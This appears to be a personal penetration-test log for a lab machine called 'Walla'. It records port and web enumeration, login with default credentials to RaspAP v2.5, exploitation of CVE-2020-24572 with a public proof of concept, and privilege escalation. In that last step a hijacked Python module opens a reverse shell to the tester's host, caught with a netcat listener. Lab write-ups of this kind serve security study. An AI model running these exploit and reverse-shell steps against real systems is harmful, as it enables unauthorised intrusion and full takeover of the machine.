Walla

๐Ÿงช Pentest Log: {{date:2025-08-11}}

๐Ÿ” Target Information

ip=192.168.187.97

๐Ÿ“ก Enumeration

๐Ÿ”Œ Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 23

Port 25

Port 53

Port 422

Port 8091

Web Content Enumeration

gobuster dir -u http://$ip:8091 -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

found /package.json, and the home page of the system; obtain default credential of the system

admin:secret

after login, found

RaspAP v2.5

Google "RaspAP v2.5 exploit", found

CVE-2020-24572

Port 42042

๐Ÿ’ฃ Exploitation

๐Ÿ“Œ Vulnerability Summary

๐Ÿš€ Exploit Execution

๐Ÿ”ง Exploit Method

Tool / Script Used:

https://github.com/gerbsec/CVE-2020-24572-POC

python3 exploit.py $ip 8091 192.168.45.163 8091 secret 1

penelope -p 8091

๐Ÿงฌ Privilege Escalation

๐Ÿ‘ค Current Access

๐Ÿ” Enumeration

Sudo:

sudo -l

found

User www-data may run the following commands on walla:
    (ALL) NOPASSWD: /sbin/ifup
    (ALL) NOPASSWD: /usr/bin/python /home/walter/wifi_reset.py
    (ALL) NOPASSWD: /bin/systemctl start hostapd.service
    (ALL) NOPASSWD: /bin/systemctl stop hostapd.service
    (ALL) NOPASSWD: /bin/systemctl start dnsmasq.service
    (ALL) NOPASSWD: /bin/systemctl stop dnsmasq.service
    (ALL) NOPASSWD: /bin/systemctl restart dnsmasq.service

๐Ÿ”“ Privilege Escalation Exploit

๐Ÿ“Œ Exploit Summary

๐Ÿ”ง Exploit Steps

mousepad wificontroller.py

import socket,subprocess,os;
import pty;


def stop(num1, num2):
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
	s.connect(("192.168.45.163",25));
	os.dup2(s.fileno(),0); 
	os.dup2(s.fileno(),1);
	os.dup2(s.fileno(),2);
	pty.spawn("/bin/bash")
	
	
def reset(num1, num2):
	pass
	
	
def start(num1, num2):
	pass


sudo /usr/bin/python /home/walter/wifi_reset.py

nc -lvnp 25